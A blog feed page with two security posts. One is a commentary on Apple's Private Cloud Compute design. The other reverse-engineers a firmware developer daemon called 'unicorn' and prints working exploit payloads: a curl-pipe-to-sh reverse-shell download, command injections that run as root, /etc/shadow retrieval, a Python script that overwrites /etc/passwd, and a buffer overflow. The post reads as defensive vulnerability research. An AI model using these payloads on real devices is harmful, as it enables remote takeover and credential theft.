Normal view

There are new articles available, click to refresh the page.
Today — 14 June 2024Main stream

PCC: Bold step forward, not without flaws

14 June 2024 at 19:46

By Adelin Travers

Earlier this week, Apple announced Private Cloud Compute (or PCC for short). Without deep context on the state of the art of Artificial Intelligence (AI) and Machine Learning (ML) security, some sensible design choices may seem surprising. Conversely, some of the risks linked to this design are hidden in the fine print. In this blog post, we’ll review Apple’s announcement, both good and bad, focusing on the context of AI/ML security. We recommend Matthew Green’s excellent thread on X for a more general security context on this announcement:

https://x.com/matthew_d_green/status/1800291897245835616

Disclaimer: This breakdown is based solely on Apple’s blog post and thus subject to potential misinterpretations of wording. We do not have access to the code yet, but we look forward to Apple’s public PCC Virtual Environment release to examine this further!

Review summary

This design is excellent on the conventional non-ML security side. Apple seems to be doing everything possible to make PCC a secure, privacy-oriented solution. However, the amount of review that security researchers can do will depend on what code is released, and Apple is notoriously secretive.

On the AI/ML side, the key challenges identified are on point. These challenges result from Apple’s desire to provide additional processing power for compute-heavy ML workloads today, which incidentally requires moving away from on-device data processing to the cloud. Homomorphic Encryption (HE) is a big hope in the confidential ML field but doesn’t currently scale. Thus, Apple’s choice to process data in its cloud at scale requires decryption. Moreover, the PCC guarantees vary depending on whether Apple will use a PCC environment for model training or inference. Lastly, because Apple is introducing its own custom AI/ML hardware, implementation flaws that lead to information leakage will likely occur in PCC when these flaws have already been patched in leading AI/ML vendor devices.

Running commentary

We’ll follow the release post’s text in order, section-by-section, as if we were reading and commenting, halting on specific passages.

Introduction


When I first read this post, I’ll admit that I misunderstood this passage as Apple starting an announcement that they had achieved end-to-end encryption in Machine Learning. This would have been even bigger news than the actual announcement.

That’s because Apple would need to use Homomorphic Encryption to achieve full end-to-end encryption in an ML context. HE allows computation of a function, typically an ML model, without decrypting the underlying data. HE has been making steady progress and is a future candidate for confidential ML (see for instance this 2018 paper). However, this would have been a major announcement and shift in the ML security landscape because HE is still considered too slow to be deployed at the cloud scale and in complex functions like ML. More on this later on.

Note that Multi-Party Computation (MPC)—which allows multiple agents, for instance the server and the edge device, to compute different parts of a function like an ML model and aggregate the result privately—would be a distributed scheme on both the server and edge device which is different from what is presented here.

The term “requires unencrypted access” is the key to the PCC design challenges. Apple could continue processing data on-device, but this means abiding by mobile hardware limitations. The complex ML workloads Apple wants to offload, like using Large Language Models (LLM), exceed what is practical for battery-powered mobile devices. Apple wants to move the compute to the cloud to provide these extended capabilities, but HE doesn’t currently scale to that level. Thus to provide these new capabilities of service presently, Apple requires access to unencrypted data.

This being said, Apple’s design for PCC is exceptional, and the effort required to develop this solution was extremely high, going beyond most other cloud AI applications to date.

Thus, the security and privacy of ML models in the cloud is an unsolved and active research domain when an auditor only has access to the model.

A good example of these difficulties can be found in Machine Unlearning—a privacy scheme that allows removing data from a model—that was shown to be impossible to formally prove by just querying a model. Unlearning must thus be proven at the algorithm implementation level.

When the underlying entirely custom and proprietary technical stack of Apple’s PCC is factored in, external audits become significantly more complex. Matthew Green notes that it’s unclear what part of the stack and ML code and binaries Apple will release to audit ML algorithm implementations.

This is also definitely true. Members of the ML Assurance team at Trail of Bits have been releasing attacks that modify the ML software stack at runtime since 2021. Our attacks have exploited the widely used pickle VM for traditional RCE backdoors and malicious custom ML graph operators on Microsoft’s ONNXRuntime. Sleepy Pickles, our most recent attack, uses a runtime attack to dynamically swap an ML model’s weights when the model is loaded.

This is also true; the design later introduced by Apple is far better than many other existing designs.

Designing Private Cloud compute

From an ML perspective, this claim depends on the intended use case for PCC, as it cannot hold true in general. This claim may be true if PCC is only used for model inference. The rest of the PCC post only mentions inference which suggests that PCC is not currently used for training.

However, if PCC is used for training, then data will be retained, and stateless computation that leaves no trace is likely impossible. This is because ML models retain data encoded in their weights as part of their training. This is why the research field of Machine Unlearning introduced above exists.

The big question that Apple needs to answer is thus whether it will use PCC for training models in the future. As others have noted, this is an easy slope to slip into.

Non-targetability is a really interesting design idea that hasn’t been applied to ML before. It also mitigates hardware leakage vulnerabilities, which we will see next.

Introducing Private Cloud Compute nodes

As others have noted, using Secure Enclaves and Secure Boot is excellent since it ensures only legitimate code is run. GPUs will likely continue to play a large role in AI acceleration. Apple has been building its own GPUs for some time, with its M series now in the third generation rather than using Nvidia’s, which are more pervasive in ML.

However, enclaves and attestation will provide only limited guarantees to end-users, as Apple effectively owns the attestation keys. Moreover, enclaves and GPUs have had vulnerabilities and side channels that resulted in exploitable leakage in ML. Apple GPUs have not yet been battle-tested in the AI domain as much as Nvidia’s; thus, these accelerators may have security issues that their Nvidia counterparts do not have. For instance, Apple’s custom hardware was and remains affected by the LeftoverLocals vulnerability when Nvidia’s hardware was not. LeftoverLocals is a GPU hardware vulnerability released by Trail of Bits earlier this year. It allows an attacker collocated with a victim on a vulnerable device to listen to the victim’s LLM output. Apple’s M2 processors are still currently impacted at the time of writing.

This being said, the PCC design’s non-targetability property may help mitigate LeftoverLocals for PCC since it prevents an attacker from identifying and achieving collocation to the victim’s device.

This is important as Swift is a compiled language. Swift is thus not prone to the dynamic runtime attacks that affect languages like Python which are more pervasive in ML. Note that Swift would likely only be used for CPU code. The GPU code would likely be written in Apple’s Metal GPU programming framework. More on dynamic runtime attacks and Metal in the next section.

Stateless computation and enforceable guarantees

Apple’s solution is not end-to-end encrypted but rather an enclave-based solution. Thus, it does not represent an advancement in HE for ML but rather a well-thought-out combination of established technologies. This is, again, impressive, but the data is decrypted on Apple’s server.

As presented in the introduction, using compiled Swift and signed code throughout the stack should prevent attacks on ML software stacks at runtime. Indeed, the ONNXRuntime attack defines a backdoored custom ML primitive operator by loading an adversary-built shared library object, while the Sleepy Pickle attack relies on dynamic features of Python.

Just-in-Time (JIT) compiled code has historically been a steady source of remote code execution vulnerabilities. JIT compilers are notoriously difficult to implement and create new executable code by design, making them a highly desirable attack vector. It may surprise most readers, but JIT is widely used in ML stacks to speed up otherwise slow Python code. JAX, an ML framework that is the basis for Apple’s own AXLearn ML framework, is a particularly prolific user of JIT. Apple avoids the security issues of JIT by not using it. Apple’s ML stack is instead built in Swift, a memory safe ahead-of-time compiled language that does not need JIT for runtime performance.

As we’ve said, the GPU code would likely be written in Metal. Metal does not enforce memory safety. Without memory safety, attacks like LeftoverLocals are possible (with limitations on the attacker, like machine collocation).

No privileged runtime access

This is an interesting approach because it shows Apple is willing to trade off infrastructure monitoring capabilities (and thus potentially reduce PCC’s reliability) for additional security and privacy guarantees. To fully understand the benefits and limits of this solution, ML security researchers would need to know what exact information is captured in the structured logs. A complete analysis thus depends on Apple’s willingness or unwillingness to release the schema and pre-determined fields for these logs.

Interestingly, limiting the type of logs could increase ML model risks by preventing ML teams from collecting adequate information to manage these risks. For instance, the choice of collected logs and metrics may be insufficient for the ML teams to detect distribution drift—when input data no longer matches training data and the model performance decreases. If our understanding is correct, most of the collected metrics will be metrics for SRE purposes, meaning that data drift detection would not be possible. If the collected logs include ML information, accidental data leakage is possible but unlikely.

Non-targetability

This is excellent as lower levels of the ML stack, including the physical layer, are sometimes overlooked in ML threat models.

The term “metadata” is important here. Only the metadata can be filtered away in the manner Apple describes. However, there are virtually no ways of filtering out all PII in the body content sent to the LLM. Any PII in the body content will be processed unencrypted by the LLM. If PCC is used for inference only, this risk is mitigated by structured logging. If PCC is also used for training, which Apple has yet to clarify, we recommend not sharing PII with systems like these when it can be avoided.

It might be possible for an attacker to obtain identifying information in the presence of side channel vulnerabilities, for instance, linked to implementation flaws, that leak some information. However, this is unlikely to happen in practice: the cost placed on the adversary to simultaneously exploit both the load balancer and side channels will be prohibitive for non-nation state threat actors.

An adversary with this level of control should be able to spoof the statistical distribution of nodes unless the auditing and statistical analysis are done at the network level.

Verifiable transparency


This is nice to see! Of course, we do not know if these will need to be analyzed through extensive reverse engineering, which will be difficult, if not impossible, for Apple’s custom ML hardware. It is still a commendable rare occurrence for projects of this scale.

PCC: Security wins, ML questions

Apple’s design is excellent from a security standpoint. Improvements on the ML side are always possible. However, it is important to remember that those improvements are tied to some open research questions, like the scalability of homomorphic encryption. Only future vulnerability research will shed light on whether implementation flaws in hardware and software will impact Apple. Lastly, only time will tell if Apple continuously commits to security and privacy by only using PCC for inference rather than training and implementing homomorphic encryption as soon as it is sufficiently scalable.

Reverse Engineering The Unicorn

14 June 2024 at 16:10

While reversing a device, we stumbled across an interesting binary named unicorn. The binary appeared to be a developer utility potentially related to the Augentix SoC SDK. The unicorn binary is only executed when the device is set to developer mode. Fortunately, this was not the default setting on the device we were analyzing. However, we were interested in the consequences of a device that could have been misconfigured.

Discovering the Binary

While analyzing the firmware, we noticed that different services will start upon boot depending on what mode the device is set to.

...SNIPPET...

rcS() {
	# update system mode if a new one exists
	$MODE -u
	mode=$($MODE)
	echo "Current system mode: $mode"

	# Start all init scripts in /etc/init.d/MODE
	# executing them in numerical order.
	#
	for i in /etc/init.d/$mode/S??* ;do

		# Ignore dangling symlinks (if any).
		[ ! -f "$i" ] && continue
		case "$i" in
		*.sh)
		    # Source shell script for speed.
		    (
			trap - INT QUIT TSTP
			set start
			. $i
		    )
		    ;;
		*)
		    # No sh extension, so fork subprocess.
		    $i start
		    ;;
		esac
	done


...SNIPPET...

If the device boots in factory or developer mode, some additional remote services such as telnetd, sshd, and the unicorn daemon are started. The unicorn daemon listens on port 6666 and attempting to manually interact with the binary didn’t yield any interesting results. So we popped the binary into Ghidra to take a look at what was happening under the hood.

Reverse Engineering the Binary

From the main function we see that if the binary is run with no arguments, it will run as a daemon.

int main(int argc,char **argv)

{
  uint uVar1;
  int iVar2;
  ushort **ppuVar3;
  size_t sVar4;
  char *pcVar5;
  char local_8028 [16];
  
  memset(local_8028,0,0x8000);
  if (argc == 1) {
    openlog("unicorn",1,0x18);
    syslog(5,"unicorn daemon ready to serve!");
                    /* WARNING: Subroutine does not return */
    start_daemon_handle_client_conns();
  }
  while( true ) {
    while( true ) {
      while( true ) {
        iVar2 = getopt(argc,argv,"hsg:c:");
        uVar1 = optopt;
        if (iVar2 == -1) {
          openlog("unicorn",1,0x18);
          syslog(5,"2 unicorn daemon ready to serve!");
                    /* WARNING: Subroutine does not return */
          start_daemon_handle_client_conns();
        }
        if (iVar2 != 0x67) break;
        local_8028[0] = '{';
        local_8028[1] = '\"';
        local_8028[2] = 'm';
        local_8028[3] = 'o';
        local_8028[4] = 'd';
        local_8028[5] = 'u';
        local_8028[6] = 'l';
        local_8028[7] = 'e';
        local_8028[8] = '\"';
        local_8028[9] = ':';
        local_8028[10] = ' ';
        local_8028[11] = '\"';
        pcVar5 = stpcpy(local_8028 + 0xc,optarg);
        memcpy(pcVar5,"\"}",3);
        sVar4 = FUN_00012564(local_8028,0xffffffff);
        if (sVar4 == 0xffffffff) {
          syslog(6,"ccClientGet failed!\n");
        }
      }
      if (0x67 < iVar2) break;
      if (iVar2 == 0x3f) {
        if (optopt == 0x73 || (optopt & 0xfffffffb) == 99) {
          fprintf(stderr,"Option \'-%c\' requires an argument.\n",optopt);
        }
        else {
          ppuVar3 = __ctype_b_loc();
          if (((*ppuVar3)[uVar1] & 0x4000) == 0) {
            pcVar5 = "Unknown option character \'\\x%x.\n";
          }
          else {
            pcVar5 = "Unknown option \'-%c\'.\n";
          }
          fprintf(stderr,pcVar5,uVar1);
        }
        return 1;
      }
      if (iVar2 != 99) goto LAB_0000bb7c;
      sprintf(&DAT_0008c4c4,optarg);
    }
    if (iVar2 == 0x68) {
      USAGE();
                    /* WARNING: Subroutine does not return */
      exit(1);
    }
    if (iVar2 != 0x73) break;
    DAT_0008d410 = 1;
  }
LAB_0000bb7c:
  puts("aborting...");
                    /* WARNING: Subroutine does not return */
  abort();
}

If the argument passed is -h (0x68), then it calls the usage function:

void USAGE(void)

{
  puts("Usage:");
  puts("\t To run unicorn as daemon, do not use any args.");
  puts("\t\'-g get \'\t get product setting. D:img_pref");
  puts("\t\'-s set \'\t set product setting. D:img_pref");
  putchar(10);
  puts("\tSample usage");
  puts("\t$ unicorn -g img_pref");
  return;
}

When no arguments are passed, a function is called that sets up and handles client connections, which can be seen above renamed as start_daemon_handle_client_conns();. Most of the code in the start_daemon_handle_client_conns() function is handling and setting up client connections. There is a small portion of the code that performs an initial check of the data received to see if it matches a specific string AgtxCrossPlatCommn.

                  else {
                    ptr_result = strstr(DATA_FROM_CLIENT,"AgtxCrossPlatCommn");
                    syslog(6,"%s(): \'%s\'\n","interpretData",DATA_FROM_CLIENT);
                    if (ptr_result == (char *)0x0) {
                      syslog(6,"Invalid command \'%s\' received! Closing client fd %d\n",0,__fd_00);
                      goto LAB_0000e02c;
                    }
                    if ((DATA_FROM_CLIENT_PLUS1[command_length] != '@') ||
                       (client_command_buffer = (byte *)(ptr_result + 0x12),
                       client_command_buffer == (byte *)0x0)) goto LAB_0000e02c;
                    if (IS_SSL_ENABLED != 1) {
                      syslog(6,"Handle action for client %2d, fdmax = %d ...\n",__fd_00,uVar12);
                      command_length =
                           handle_client_cmd(client_command_buffer,client_info,command_length);
                      if (command_length != 0) {
                        send_response_to_client
                                  ((int)*client_info,apSStack_8520 + uVar9 * 5 + 2,command_length);
                      }
                      goto LAB_0000e02c;
                    }

The AgtxCrossPlatCommn portion of the code checks whether or not the data received ends with an @ character or if the data following AgtxCrossPlatCommn string is NULL. If the data doesn’t end with an @ character or the data following the key string is NULL it branches off. If these checks pass, the data is then sent to another function which handles the processing of the commands from the client. At this point we know that the binary expects to receive data in the format AgtxCrossPlatCommn<DATA>@. The handle_client_cmd function is where the fun happens. The beginning of the function handles some additional processing of the data received.

  if (client_command_buffer == (byte *)0x0) {
    syslog(6,"Invalid action: sig is NULL \n");
    return -3;
  }
  ACTION_NUM = get_Action_NUM(client_command_buffer);
  client_command = get_cmd_data(client_command_buffer,command_length);
  operation_result = ACTION_NUM;
  iVar1 = command_length;
  ptr_to_cmd = client_command;
  syslog(6,"%s(): action %d, nbytes %d, params %s\n","handleAction",ACTION_NUM,command_length,
         client_command);
  memset(system_command_buffer,0,0x100);
  switch(ACTION_NUM) {
  case 0:

The binary is expecting the data received to contain a number, which is parsed out and passed to a switch() statement to determine which action needs to be executed. There are a total of 15 actions which perform various tasks such as read files, write files, execute arbitrary commands (some intentional, others not), along with others whose purpose wasn’t not inherently clear. The first action number which caught our eye was 14 (0xe) as it appeared to directly allow us to run commands.

  case 0xe:
/* execute commands here
AgtxCrossPlatCommn14 sh -c 'curl 192.168.55.1/shell.sh | sh'@ */

    replaceLastByteWithNull((byte *)client_command,0x40,command_length);
    syslog(6,"ACT_cmd: |%s| \n",client_command);
    command_params = strstr(client_command,"rm ");
    if (command_params == (char *)0x0) {
      command_params = strstr(client_command,"audioctrl");
      if (((((((command_params != (char *)0x0) ||
              (command_params = strstr(client_command,"light_test"), command_params != (char *)0x0))
             || (command_params = strstr(client_command,"ir_cut.sh"), command_params != (char *)0x0)
             ) || ((command_params = strstr(client_command,"led.sh"), command_params != (char *)0x0
                   || (command_params = strstr(client_command,"sh"), command_params != (char *)0x0))
                  )) ||
           ((command_params = strstr(client_command,"touch"), command_params != (char *)0x0 ||
            ((command_params = strstr(client_command,"echo"), command_params != (char *)0x0 ||
             (command_params = strstr(client_command,"find"), command_params != (char *)0x0)))))) ||
          (command_params = strstr(client_command,"iwconfig"), command_params != (char *)0x0)) ||
         (((((command_params = strstr(client_command,"ifconfig"), command_params != (char *)0x0 ||
             (command_params = strstr(client_command,"killall"), command_params != (char *)0x0)) ||
            (command_params = strstr(client_command,"reboot"), command_params != (char *)0x0)) ||
           (((command_params = strstr(client_command,"mode"), command_params != (char *)0x0 ||
             (command_params = strstr(client_command,"gpio_utils"), command_params != (char *)0x0))
            || ((command_params = strstr(client_command,"bp_utils"), command_params != (char *)0x0
                || ((command_params = strstr(client_command,"sync"), command_params != (char *)0x0
                    || (command_params = strstr(client_command,"chmod"),
                       command_params != (char *)0x0)))))))) ||
          ((command_params = strstr(client_command,"dos2unix"), command_params != (char *)0x0 ||
           (command_params = strstr(client_command,"mkdir"), command_params != (char *)0x0)))))) {
        syslog(6,"Command code: %d\n");
        system_command_status = run_system_cmd(client_command);
        goto LAB_0000b458;
      }
      system_command_result = -1;
    }
    else {
      system_command_result = -2;
    }
    syslog(3,"Invaild command code: %d\n",system_command_result);
    system_command_status = -1;
LAB_0000b458:
    send_response_to_client((int)*client_info,(SSL **)(client_info + 4),system_command_status);
    break;

To test, we manually started the unicorn binary and attempted to issue an ifconfig command with the payload AgtxCrossPlatCommn14ifconfig@ and the following python script:

import socket

HOST = "192.168.55.128" 
PORT = 6666  

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    s.sendall(b"AgtxCrossPlatCommn14ifconfig@")
    data = s.recv(1024)
    print("RX:", data.decode('utf-8'))
    s.close()

No data was written back to the socket, but on emulated device we saw that the command was executed:

/system/bin # ./unicorn 
eth0      Link encap:Ethernet  HWaddr 52:54:00:12:34:56  
          inet addr:192.168.100.2  Bcast:192.168.100.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:5849 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4680 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:6133675 (5.8 MiB)  TX bytes:482775 (471.4 KiB)
          Interrupt:47 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Note that the difference in the IP is due to the device being emulated utilizing EMUX (https://emux.exploitlab.net/). One of the commands that is “allowed” per this case is sh, which means we can actually run any command on the system and not just ones listed. For example, the following payload could be used to download and execute a reverse shell on the device:

AgtxCrossPlatCommn14 sh -c 'curl 192.168.55.1/shell.sh | sh'@

Even if this case didn’t allow for the execution of sh, commands could still be chained together and executed with a payload like AgtxCrossPlatCommn14echo hello;id;ls -l@.

/system/bin # ./unicorn                                                                             
hello                                                                                               
uid=0(root) gid=0(root) groups=0(root),10(wheel)                                                    
-rwxr-xr-x    1 dbus     dbus          3774 Apr  9 20:33 actl
-rwxr-xr-x    1 dbus     dbus          2458 Apr  9 20:33 adc_read    
-rwxr-xr-x    1 dbus     dbus       1868721 Apr  9 20:33 av_main   
-rwxr-xr-x    1 dbus     dbus          5930 Apr  9 20:33 burn_in
-rwxr-xr-x    1 dbus     dbus        451901 Apr  9 20:33 cmdsender
-rwxr-xr-x    1 dbus     dbus         13166 Apr  9 20:33 cpu      
-rwxr-xr-x    1 dbus     dbus        162993 Apr  9 20:33 csr    
-rwxr-xr-x    1 dbus     dbus          9006 Apr  9 20:33 dbmonitor
-rwxr-xr-x    1 dbus     dbus         13065 Apr  9 20:33 ddr2pgm     
-rwxr-xr-x    1 dbus     dbus          2530 Apr  9 20:33 dump                  
-rwxr-xr-x    1 dbus     dbus          4909 Apr  9 20:33 dump_csr   
...SNIP...

We performed analysis of other areas of the unicorn executable and identified additional command injection and buffer overflow vulnerabilities. Case 2 is used to execute the cmdsender binary on the device, which appears to be a utility to control certain camera related aspects of the device.

  case 2:
    replaceLastByteWithNull((byte *)client_command,0x40,command_length);
    path_buffer[0] = '/';
    path_buffer[1] = 's';
    path_buffer[2] = 'y';
    path_buffer[3] = 's';
    path_buffer[4] = 't';
    path_buffer[5] = 'e';
    path_buffer[6] = 'm';
    path_buffer[7] = '/';
    path_buffer[8] = 'b';
    path_buffer[9] = 'i';
    path_buffer[10] = 'n';
    path_buffer[11] = '/';
    path_buffer[12] = 'c';
    path_buffer[13] = 'm';
    path_buffer[14] = 'd';
    path_buffer[15] = 's';
    path_buffer[16] = 'e';
    path_buffer[17] = 'n';
    path_buffer[18] = 'd';
    path_buffer[19] = 'e';
    path_buffer[20] = 'r';
    path_buffer[21] = ' ';
    path_buffer[22] = '\0';
    memset(large_buffer,0,0x7fe9);
    strcpy(path_buffer + 0x16,client_command);
    run_system_cmd(path_buffer);
    break;

Running the cmdsender binary on the device:

/system/bin # ./cmdsender -h        
[VPLAT] VB init fail.                                                                                                                                                                                    [VPLAT] UTRC init fail.                                                                                                                                                                                  [VPLAT] SR open shared memory fail.                                                                                                                                                                      [VPLAT] SENIF init fail.                                                                                                                                                                                 
[VPLAT] IS init fail.                            
[VPLAT] ISP init fail.                                                                              
[VPLAT] ENC init fail.                                                                                                                                                                                   
[VPLAT] OSD init fail.                                                                              
USAGE:                                                                                                                                                                                                   
        ./cmdsender [Option] [Parameter]                                                                                                                                                                 
                                                                                                                                                                                                         
OPTION:                                           
        '--roi dev_idx path_idx luma_roi.sx luma_roi.sy luma_roi.ex luma_roi.ey awb_roi.sx awb_roi.sy awb_roi.ex awb_roi.ey' Set ROI attributes
        '--pta dev_idx path_idx mode brightness_value contrast_value break_point_value pta_auto.tone[0 ~ MPI_ISO_LUT_ENTRY_NUM-1] pta_manual.curve[0 ~ MPI_PTA_CURVE_ENTRY_NUM-1]' Set PTA attributes
                                                                                                    
        '--dcc dev_idx path_idx gain0 offset0 gain1 offset1 gain2 offset2 gain3 offset3' Set DCC attributes
                                                                                                    
        '--dip dev_idx path_idx is_dip_en is_ae_en is_iso_en is_awb_en is_csm_en is_te_en is_pta_en is_nr_en is_shp_en is_gamma_en is_dpc_en is_dms_en is_me_en' Set DIP attributes
                                                                                                    
        '--lsc dev_idx path_idx origin x_trend_2s y_trend_2s x_curvature y_curvature tilt_2s' Set LSC attributes
                                                                                                                                                                                                                 '--gamma dev_idx path_idx mode' Set GAMMA attributes                                                                                                                                             
                                                                                                    
        '--ae dev_idx path_idx sys_gain_range.min sys_gain_range.max sensor_gain_range.min sensor_gain_range.max isp_gain_range.min isp_gain_range.max frame_rate slow_frame_rate speed black_speed_bias 
interval brightness tolerance gain_thr_up gain_thr_down 
              strategy.mode strategy.strength roi.luma_weight roi.awb_weight delay.black_delay_frame delay.white_delay_frame anti_flicker.enable anti_flicker.frequency anti_flicker.luma_delta fps_mode 
manual.is_valid manual.enable.bit.exp_value manual.enable.bit.inttime
              manual.enable.bit.sensor_gain manual.enable.bit.isp_gain manual.enable.bit.sys_gain manual.exp_value manual.inttime manual.sensor_gain manual.isp_gain manual.sys_gain' Set AE attributes

        '--iso dev_idx path_idx mode iso_auto.effective_iso[0 ~ MPI_ISO_LUT_ENTRY_NUM-1] iso_manual.effective_iso' Set iso attributes

        '--dbc dev_idx path_idx mode dbc_level' Set DBC attributes

The arguments that are intended to be used with the cmdsender command are received and copied directly to the cmdsender path, which is then passed run_system_cmd, which simply runs system() on the given argument. The payload AgtxCrossPlatCommn2 ; id @ causes the id command to be run on the device:

/system/bin # ./unicorn 
[VPLAT] VB init fail.
[VPLAT] UTRC init fail.
[VPLAT] SR open shared memory fail.
[VPLAT] SENIF init fail.
[VPLAT] IS init fail.
[VPLAT] ISP init fail.
[VPLAT] ENC init fail.
[VPLAT] OSD init fail.
executeCmd(): Unknown command item
item: 920495836, direction: 1
printCmd(): Unknown command item
uid=0(root) gid=0(root) groups=0(root),10(wheel)

Case 4 handles sending files from the device to the connecting client, for example to get /etc/shadow from the device, the payload AgtxCrossPlatCommn4/etc/shadow@ can be used.

python3 case_4.py 
b'root:$1$3hkdVSSD$iPawbqSvi5uhb7JIjY.MK0:10933:0:99999:7:::\ndaemon:*:10933:0:99999:7:::\nbin:*:10933:0:99999:7:::\nsys:*:10933:0:99999:7:::\nsync:*:10933:0:99999:7:::\nmail:*:10933:0:99999:7:::\nwww-data:*:10933:0:99999:7:::\noperator:*:10933:0:99999:7:::\nnobody:*:10933:0:99999:7:::\ndbus:*:::::::\nsshd:*:::::::\nsystemd-bus-proxy:*:::::::\nsystemd-journal-gateway:*:::::::\nsystemd-journal-remote:*:::::::\nsystemd-journal-upload:*:::::::\nsystemd-timesync:*:::::::\n'

Case 5 appears to be for receiving files from a client and is also vulnerable to command injection. Although in this instance spaces break execution, which limits what can be run.

  case 5:
    replaceLastByteWithNull((byte *)client_command,0x40,command_length);
    file_size = parse_file_size((byte *)client_command);
    string_length = strlen(client_command);
    filename = get_cmd_data((byte *)client_command,string_length);
    syslog(6,"fSize = %lu\n",file_size);
    syslog(6,"fPath = \'%s\'\n",filename);
    sprintf(system_command_buffer,"%lu",file_size);
    syslog(6,"ret_value: %s\n",system_command_buffer);
    string_length = strlen(system_command_buffer);
    send_data_to_client((int *)client_info,system_command_buffer,string_length);
    operation_result = recieve_file((int)*client_info,(char *)filename,file_size);
    send_response_to_client((int)*client_info,(SSL **)(client_info + 4),operation_result);
    break;

The format of this command is:

AgtxCrossPlatCommn5<FILE> <NUM-BYTES>@

<FILE> is the name of the file to write and <NUM-BYTES> is the number of bytes that will be sent in the subsequent client transmit. The parse_file_size() function looks for the space and attempts to read the following characters as the number of bytes that will be sent. A command with no spaces, such as the id command, can be injected into the <FILE> portion:

AgtxCrossPlatCommn5test.txt;id #@

# Output from device
/system/bin # ./unicorn 
dos2unix: can't open 'test.txt': No such file or directory
uid=0(root) gid=0(root) groups=0(root),10(wheel)
^C

/system/bin # ls -l test.*
----------    1 root     root             0 Apr 18  2024 test.txt;id

This case can also be used to overwrite files. The follow POC changes the first line in /etc/passwd:

import socket

HOST = "192.168.55.128" 
PORT = 6666 

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    s.sendall(b"AgtxCrossPlatCommn5/etc/passwd 29@")
    print(s.recv(1024))
    s.sendall(b"haxd:x:0:0:root:/root:/bin/sh")
    print(s.recv(1024))
    s.close()
/system/bin # cat /etc/passwd
haxd:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
operator:x:37:37:Operator:/var:/bin/false
nobody:x:99:99:nobody:/home:/bin/false
dbus:x:1000:1000:DBus messagebus user:/var/run/dbus:/bin/false
sshd:x:1001:1001:SSH drop priv user:/:/bin/false
systemd-bus-proxy:x:1002:1004:Proxy D-Bus messages to/from a bus:/:/bin/false
systemd-journal-gateway:x:1003:1005:Journal Gateway:/var/log/journal:/bin/false
systemd-journal-remote:x:1004:1006:Journal Remote:/var/log/journal/remote:/bin/false
systemd-journal-upload:x:1005:1007:Journal Upload:/:/bin/false
systemd-timesync:x:1006:1008:Network Time Synchronization:/:/bin/false

Case 8 contains a command injection vulnerability. It is used to run the fw_setenv command, but takes user input as an argument and builds the command string which gets passed directly to a system() call.

  case 8:
  /* command injection here
    AgtxCrossPlatCommn8 ; touch /tmp/fw-setenv-cmdinj.txt # @ */
    
    replaceLastByteWithNull((byte *)client_command,0x40,command_length);
    if (*client_command == '\0') {
      command_params = "fw_setenv --script /system/partition";
    }
    else {
      operation_result = FUN_0000ccd8(client_command);
      if (operation_result != 1) {
        operation_result = FUN_0000da18((int *)client_info,client_command);
        if (operation_result != -1) {
          return 0;
        }
        operation_result = -1;
        goto LAB_0000b63c;
      }
      sprintf(system_command_buffer,"fw_setenv %s",client_command);
      command_params = system_command_buffer;
    }
    system_command_status = run_system_cmd(command_params);
    goto LAB_0000b458;

The payload AgtxCrossPlatCommn8;id @ will cause the id command to be executed.

Case 13 contains a buffer overflow vulnerability. The use case case runs cat on a user provided file. If the filename or path is too long, it causes a buffer overflow.

  case 0xd:
    replaceLastByteWithNull((byte *)client_command,0x40,command_length);
    syslog(6,"ACT_cat: |%s| \n",client_command);
    operation_result = execute_cat_cmd((int *)client_info,client_command);
    if (operation_result != -1) {
      return 0;
    }
LAB_0000b63c:
    sprintf(system_command_buffer,"%d",operation_result);
    string_length = strlen(system_command_buffer);
    send_data_to_client((int *)client_info,system_command_buffer,string_length);
    break;
int execute_cat_cmd(int *socket_info,char *file_path)

{
  size_t result_length;
  char cat_command [128];
  char cat_result [256];
  
  memset(cat_result,0,0x100);
  memset(cat_command,0,0x80);
                    /* Buffer overflow here when file_path > 128
                        */
  sprintf(cat_command,"cat %s",file_path);
  FUN_0000cdc4(cat_command,cat_result);
  result_length = strlen(cat_result);
  send_data_to_client(socket_info,cat_result,result_length);
  return 0;
}

Sending a large amount of A’s causes a segfault showing several registers, including the program counter, and the stack are overwritten with A’s. The payload AgtxCrossPlatCommn13 AAAAAAAAAAAAAA…snipped… @ will cause a crash.

Program received signal SIGSEGV, Segmentation fault.
0x41414140 in ?? ()
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$r0  : 0x0       
$r1  : 0x7efe7188  →  0x4100312d ("-1"?)
$r2  : 0x2       
$r3  : 0x0       
$r4  : 0x41414141 ("AAAA"?)
$r5  : 0x41414141 ("AAAA"?)
$r6  : 0x13a0    
$r7  : 0x7efef628  →  0x00000005
$r8  : 0x7efefaea  →  "   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$r9  : 0x0008d40c  →  0x00000000
$r10 : 0x13a0    
$r11 : 0x41414141 ("AAAA"?)
$r12 : 0x0       
$sp  : 0x7efe7298  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$lr  : 0x00012de4  →  0xe1a04000
$pc  : 0x41414140 ("@AAA"?)
$cpsr: [negative ZERO CARRY overflow interrupt fast THUMB]
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
